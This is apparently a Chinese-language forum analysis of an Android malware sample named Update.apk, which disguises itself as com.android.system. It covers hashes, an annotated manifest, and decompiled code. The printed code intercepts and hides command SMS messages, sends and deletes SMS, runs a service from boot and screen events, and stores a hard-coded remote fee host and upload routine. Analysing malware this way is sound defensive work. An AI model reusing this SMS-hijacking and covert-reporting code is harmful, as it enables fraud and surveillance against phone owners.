一.基本信息 文件名称:Update.apk MD5:396ecd933e52403c645c1241de501696 Sha-1:29051ca16672b9cb2b5940cc2e0d8feeb6a51262 应用名称:Audience 文件包名:com.android.system
二.AndroidManifest.xml [Asm] 纯文本查看 复制代码 <receiver android:label="@string/app_name" android:name=".Audiencer">
<intent-filter android:priority="2147483647">//最高优先级,可先于系统短信应用收到 SMS_RECEIVED 广播,再配合 abortBroadcast() 拦截短信
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>
<service android:name=".Audience" />//启动的服务
</application>
<uses-permission android:name="android.permission.INTERNET" />//联网
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />//访问网络状态
<uses-permission android:name="android.permission.WRITE_APN_SETTINGS" />//改写APN设置
<uses-permission android:name="android.permission.WRITE_APN_SETTING" />//非标准权限名(疑为上一行 WRITE_APN_SETTINGS 的拼写错误)
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />//访问wifi
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />//开机开启广播
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.READ_SMS" />//读信息
<uses-permission android:name="android.permission.WRITE_SMS" />//写信息
<uses-permission android:name="android.permission.SEND_SMS" />//发信息
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />//监视,修改有关拨出电话
<uses-permission android:name="android.permission.WAKE_LOCK" />//手机屏幕关闭后后台进程仍然运行
<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />//挂载、反挂载外部文件系统
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />//写sd卡
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" />
<uses-permission android:name="android.permission.READ_LOGS" />//读取系统日志
<uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" />//关闭后台程序
<uses-permission android:name="android.permission.RESTART_PACKAGES" />//重启程序
<uses-permission android:name="android.permission.READ_PHONE_STATE" />//读取电话状态
</manifest>
三.分析 1) 安装完成后重新开机,可验证其具有开机自启动,启动对象为 .Audiencer,伪装包名为 com.android.system
同时具有:屏幕关闭时启动服务,监控短信(收到短信)启动服务 2)BroadcastReceiver:Audiencer [Asm] 纯文本查看 复制代码 public void onReceive(Context paramContext, Intent paramIntent)
{
int i = 0;
Log.e(Audiencer.class.getSimpleName(), paramIntent.getAction());
if (this.a == null)
{
this.a = new Intent();
this.a.setClass(paramContext, Audience.class);//启动 Audience服务
}
if ("android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction()))//当接受到短信时
{
Object[] arrayOfObject = (Object[])paramIntent.getExtras().get("pdus");
SmsMessage[] arrayOfSmsMessage;
if ((arrayOfObject != null) && (arrayOfObject.length > 0))
arrayOfSmsMessage = new SmsMessage[arrayOfObject.length];
for (int j = 0; ; j++)
{
if (j >= arrayOfObject.length)
{
int k = arrayOfSmsMessage.length;
if (i < k)
break;
return;
}
arrayOfSmsMessage[j] = SmsMessage.createFromPdu((byte[])arrayOfObject[j]);
}
SmsMessage localSmsMessage = arrayOfSmsMessage[i];
String str1 = localSmsMessage.getMessageBody();
String str2 = localSmsMessage.getOriginatingAddress();
if (str1.startsWith("ch:"))//监听 拦截短信内容以 “ch:”开始的短信,获得网址,写入数据库
{
Audience.e().a(str1.substring(3));
abortBroadcast();
return;
}
if (str1.startsWith("pr:"))//拦截短信内容以 “pr:” 开始的短信,记录mobile号码
{
Audience.e().b(str1.substring(3));//记录接受到每1位mobile号,写入HashMap中,最后写入数据库
abortBroadcast();
return;
}
Audience.e().c().a("SmsReceiver mobile:" + str2 + " content:" + str1);
if (Audience.e().k().a(str2, str1, null))//str2为电话号码,str1为信息内容
{
System.out.println("need response");
Audience.e().k().b(str1);//str1为信息内容
switch (Audience.e().k().a().g())
{
case 3:
default:
case 0:
case 1:
case 2:
}
}
while (true)
{
i++;
break;
abortBroadcast();
continue;
abortBroadcast();
continue;
abortBroadcast();
if (!Audience.e().k().a().a(str2, str1))
continue;
a.a.f.a(Audience.e().k().a().a(str2), Audience.e().k().a(str1));//发送信息
}
}
Log.e("Process", "service is:" + Audience.e());
if (Audience.e() != null)
if ("android.intent.action.SCREEN_ON".equals(paramIntent.getAction()))//屏幕打开时
Log.e("Receiver", "Screen_ON");
while (true)
{
try
{
Audience.e().o();
}
catch (Exception localException1)
{
try
{
if (!Audience.a)
continue;
Audience.e().m();
if (Audience.a)
break;
Log.e("Process", "Start Service By Dial Or Start up");
paramContext.startService(this.a);
return;
localException1 = localException1;
localException1.printStackTrace();
continue;
}
catch (Exception localException2)
{
localException2.printStackTrace();
continue;
}
}
if (!"android.intent.action.SCREEN_OFF".equals(paramIntent.getAction()))//屏幕关闭时
continue;
Log.e("Receiver", "Screen_OFF");
if (Audience.a)
{
paramContext.startService(this.a);//屏幕关闭时,启动服务
Log.e("Process", "Start Service");
}
Audience.e().l();
continue;
if (!Audience.a)
continue;
Log.e("Process", "Start Service By Dial Or Start up");
paramContext.startService(this.a);
}
}
3)拦截信息,获取记录接受到每1位mobile号 [Asm] 纯文本查看 复制代码 public final void b(String paramString)//记录接受到每1位mobile号
{
StringBuffer localStringBuffer = new StringBuffer();
int i1 = 0;
if (i1 >= paramString.length())
{
c(localStringBuffer.toString());
return;
}
int i2 = paramString.charAt(i1);
if (i2 == 97)
localStringBuffer.append('0');
while (true)
{
i1++;
break;
if (i2 == 98)
{
localStringBuffer.append('1');
continue;
}
if (i2 == 99)
{
localStringBuffer.append('2');
continue;
}
if (i2 == 100)
{
localStringBuffer.append('3');
continue;
}
if (i2 == 101)
{
localStringBuffer.append('4');
continue;
}
if (i2 == 102)
{
localStringBuffer.append('5');
continue;
}
if (i2 == 103)
{
localStringBuffer.append('6');
continue;
}
if (i2 == 104)
{
localStringBuffer.append('7');
continue;
}
if (i2 == 105)
{
localStringBuffer.append('8');
continue;
}
if (i2 != 106)
continue;
localStringBuffer.append('9');
}
3)对接收到的命令信息执行: [Asm] 纯文本查看 复制代码 public final void b(String paramString)// paramString is the SMS message body (decompiled; obfuscated names)
{
// Logs this.c under the tag "waitForSmsJob" — a fixed string that is useful as a logcat detection marker.
Log.e("waitForSmsJob", this.c);
if (this.c != null)
{
// When this.a.l() is null or blank, this.d is handed to the handler first; what l() and d represent is not visible in this excerpt — confirm in this.a.
if ((this.a.l() == null) || (this.a.l().trim().length() == 0))
this.c.a(this.d);
}
else
// No handler attached: the incoming message is dropped without further processing.
return;
// The message body is transformed by c(paramString) (not shown here) and passed to the handler.
this.c.a(c(paramString));// original note: j.a(c(paramString)) — waits for the received message and processes its content
}
4)数据库Audience.db进行信息记录 [Asm] 纯文本查看 复制代码 public final void onCreate(SQLiteDatabase paramSQLiteDatabase)
{
// Creates the "sysapp" table and seeds it with a single row holding the serialized runtime config.
// Decompiled output: obfuscated names and a decompiler-flattened loop (see the note before "if (i >= 18)").
// a(...) is a logging helper that is not visible in this excerpt.
a("DBOpenHelper onCreate");
try
{
// Single-row key/value store: _id plus one "config" string of up to 2048 chars.
paramSQLiteDatabase.execSQL("CREATE TABLE IF NOT EXISTS sysapp (_id integer primary key, config varchar (2048))");
// this.b is the in-memory config map; Audience.e().j() supplies the first scheduling value (its source is not shown here).
this.b.put("next_work_time", Audience.e().j());
this.b.put("next_work_time2", "86400");
Map localMap = this.b;
// java.util.Random, not SecureRandom: the generated "pid" is a predictable identifier, not a secret.
Random localRandom = new Random();
StringBuffer localStringBuffer1 = new StringBuffer("");
int i = 0;
ContentValues localContentValues;
StringBuffer localStringBuffer2;
Iterator localIterator;
// Decompiler artefact: this if/while pair is one loop that appends 18 random decimal digits to
// localStringBuffer1 (the append/i++ lines sit after the "return" below) and then enters this block.
if (i >= 18)
{
localMap.put("pid", localStringBuffer1.toString());// original note: the keys below hold the various response/reply commands
this.b.put("response_to_who", "");
this.b.put("reply_response_to_who", "");
this.b.put("reply_response_to_what", "");
this.b.put("response_type", "3");
this.b.put("remain_time", "0");
this.b.put("mobile", "");
this.b.put("start_time", "0");
this.b.put("response_to_what", "");
this.b.put("change_to_who", "");
this.b.put("change_to_what", "");
this.b.put("reply_who", "");
this.b.put("reply_what", "");
this.b.put("content_cutter", "");
this.b.put("heart_beat", "0");
this.b.put("heart_beat_last_work", "0");
this.b.put("heart_beat_last_work2", "0");
this.b.put("heart_beat_start_block", "0");
// Hard-coded remote endpoint (host:port/path) — presumably where the service reports; the host is a network indicator worth alerting on.
this.b.put("fee_host", "post://g.kong-mobile.com:8000/g");
this.b.put("work_count", "0");
// Opaque base64-looking blob; how it is decoded or used is not shown in this excerpt.
this.b.put("phs", "YLsLcpcCe/qnwGUFzsr1vqeJqOUyka1A8WL4ZxiyNcOkgpVRFz9gC2UqVBCL K6Q5DQUSoGYjikdAqMlU9btuXnN2sDCAo6vugMP9PTHnEFNb2egaNqWvmj95 y2DagjgP96SxsoOC3mCtXV29EJ7GaIkeBx3klqrZ0jgQgqWyRYVE5HvsXBRo Y/Jp9H3u8oBh1Tcb6JD+Sd423xm6PKnkobISdYPR/pQEW8nOh8LRy/Qhfvev xcHAPmzcWngvxCP3sJl3HtIDgltBjXtN1ehMLSgyP7HOsx9kGaYZBIx9zHh5 rYsjR2s5Uu+ljB1Hd3X+VxL+nYIA8g1QD/mcOcUUC3sPgiCeQo+q/Z1p/XbH Sd4fUidWEbEXtH3fbyrYQEZZUq5t6QAaganu3qiDqefSaFJuTDJOoWnFwGPV 36sl3NSY1QOamu9cVaBOv+yT8d7XxmQuCjoDBCQl6Py5y/MHGl+wQSdkxIX4 X+bkUS2GKFvoF+dYyMGIr5pxSqBbnFjZ");
// The config is always stored as row _id = 1.
localContentValues = new ContentValues();
localContentValues.put("_id", Integer.valueOf(1));
localStringBuffer2 = new StringBuffer();
localIterator = this.b.entrySet().iterator();
}
while (true)
{
if (!localIterator.hasNext())
{
// All entries serialized: write the row and log the full config string.
localContentValues.put("config", localStringBuffer2.toString());
paramSQLiteDatabase.insert("sysapp", null, localContentValues);
a("DBOpenHelper.onCreate " + localStringBuffer2.toString());
return;
// Body of the 18-digit "pid" loop (see the note above); unreachable here only because of decompiler flattening.
localStringBuffer1.append(localRandom.nextInt(10));
i++;
break;
}
// Serialization format: key[=]value pairs joined by "[P]" — the same layout seen in the sysapp dump below.
Map.Entry localEntry = (Map.Entry)localIterator.next();
if (localStringBuffer2.length() != 0)
localStringBuffer2.append("[P]");
localStringBuffer2.append((String)localEntry.getKey()).append("[=]").append((String)localEntry.getValue());
}
}
catch (Exception localException)
{
// Failures are only logged via a(...), never surfaced to the caller.
a("DBOpenHelper.onCreate " + localException.toString());
}
}
对应数据库表sysapp记录各种操作信息: next_work_time2[=]86400[P]response_to_what[=][P]work_count[=]2[P]reply_response_to_who[=][P]heart_beat_start_block[=]0[P]reply_response_to_what[=][P]pid[=]880085661072784632[P]heart_beat[=]374[P]remain_time[=]0[P]response_to_who[=][P]next_work_time[=]180[P]heart_beat_last_work[=]374[P]fee_host[=]post://g.kong-mobile.com:8000/g[P]content_cutter[=][P]response_type[=]3[P]phs[=]YLsLcpcCe/qnwGUFzsr1vqeJqOUyka1A8WL4ZxiyNcOkgpVRFz9gC2UqVBCL K6Q5DQUSoGYjikdAqMlU9btuXnN2sDCAo6vugMP9PTHnEFNb2egaNqWvmj95 y2DagjgP96SxsoOC3mCtXV29EJ7GaIkeBx3klqrZ0jgQgqWyRYVE5HvsXBRo Y/Jp9H3u8oBh1Tcb6JD+Sd423xm6PKnkobISdYPR/pQEW8nOh8LRy/Qhfvev xcHAPmzcWngvxCP3sJl3HtIDgltBjXtN1ehMLSgyP7HOsx9kGaYZBIx9zHh5 rYsjR2s5Uu+ljB1Hd3X+VxL+nYIA8g1QD/mcOcUUC3sPgiCeQo+q/Z1p/XbH Sd4fUidWEbEXtH3fbyrYQEZZUq5t6QAaganu3qiDqefSaFJuTDJOoWnFwGPV 36sl3NSY1QOamu9cVaBOv+yT8d7XxmQuCjoDBCQl6Py5y/MHGl+wQSdkxIX4 X+bkUS2GKFvoF+dYyMGIr5pxSqBbnFjZ[P]change_to_who[=][P]reply_what[=][P]reply_who[=][P]change_to_what[=][P]heart_beat_last_work2[=]0[P]start_time[=]0[P]mobile[=]
5) 模块 a/a/f 通过 content://sms 对短信进行修改、删除等操作: paramContentResolver.delete(Uri.parse("content://sms"), " _id = " + paramInt, null); paramContentResolver.update(Uri.parse("content://sms"), localContentValues, " _id = " + paramInt, null); 6) 模块 a/b/b 具有联网功能,以 Cookie 请求头的形式上传信息: setRequestProperty("Cookie", localStringBuffer.toString());
简单分析,大牛勿喷 |